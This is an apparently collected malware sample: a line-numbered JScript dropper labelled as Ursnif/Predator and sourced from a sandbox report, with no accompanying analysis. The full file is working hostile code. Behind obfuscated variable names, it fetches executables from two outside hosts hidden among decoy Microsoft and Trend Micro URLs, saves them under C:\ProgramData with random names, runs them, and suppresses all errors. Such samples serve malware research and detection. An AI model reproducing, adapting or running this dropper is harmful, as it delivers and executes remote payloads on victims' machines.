js-dropper-001

1. // #ursnif #predator dropper
2. // from https://app.any.run/tasks/f6eec462-6b4c-43a8-89ce-0749f0a2a77e/
3.  
4. var c81a84500ed1b00245d5915b6f378c4b9 = ['https://docs.microsoft.com/en-us/aspnet/index/404', 'https://docs.microsoft.com/en-us/office/index/404', 'https://www.trendmicro.com/de_de/404.html', '4IGng/0ZfL57M', '', 'http://sogrospina.com/angosz/cecolf.php?l=allix1.tar', 'http://thachastew.com/Lwos.php'];
5.  
6. function c5e48828ccea2a557e05addda6e8a356c(c920de1499def1eaca0fc3daa89faaf36){
7.         try{
8.         var c06366560112cb267da2b804c02434d31 = WScript.CreateObject('MSXML2.XMLHTTP');
9.         c06366560112cb267da2b804c02434d31.Open('GET', c920de1499def1eaca0fc3daa89faaf36, false);
10.         c06366560112cb267da2b804c02434d31.Send();
11.  
12.         var ccb2ed58980ab60a3e21e23f385a6a6dd = Math.round(Math.random() * 103);
13.  
14.         if (c06366560112cb267da2b804c02434d31.Status == 200)
15.         {
16.             var cedd9f28b97948c82c3a1374834be6825 = WScript.CreateObject('ADODB.Stream');
17.  
18.             cedd9f28b97948c82c3a1374834be6825.Open();
19.             cedd9f28b97948c82c3a1374834be6825.Type = 1;
20.             cedd9f28b97948c82c3a1374834be6825.Write(c06366560112cb267da2b804c02434d31.ResponseBody);
21.             cedd9f28b97948c82c3a1374834be6825.Position = 0;
22.  
23.             var cab6a85a7de6f8c8b456daa68bd3d4961 = WScript.CreateObject('Scripting.FileSystemObject');
24.             if (cab6a85a7de6f8c8b456daa68bd3d4961.FileExists('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe'))
25.             {
26.                 cab6a85a7de6f8c8b456daa68bd3d4961.DeleteFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe');
27.             }
28.  
29.             cedd9f28b97948c82c3a1374834be6825.SaveToFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe', 2);
30.             cedd9f28b97948c82c3a1374834be6825.Close();
31.  
32.             (new ActiveXObject("Shell.Application").Open("C:\\ProgramData\\204" + ccb2ed58980ab60a3e21e23f385a6a6dd + ".exe"));
33.  
34.         }
35.  
36.         }catch(e){}
37. }
38.  
39. for(var cd62a3ae55404f7d993846e953694ff01 = 0; cd62a3ae55404f7d993846e953694ff01 < c81a84500ed1b00245d5915b6f378c4b9.length; cd62a3ae55404f7d993846e953694ff01++){
40.  
41.     var c66d5f0ffe276525f3b2df450f48f1d96 = function() {c5e48828ccea2a557e05addda6e8a356c(c81a84500ed1b00245d5915b6f378c4b9[cd62a3ae55404f7d993846e953694ff01])};
42.     c66d5f0ffe276525f3b2df450f48f1d96();
43.     WScript.Sleep(4603);
44.  
45. }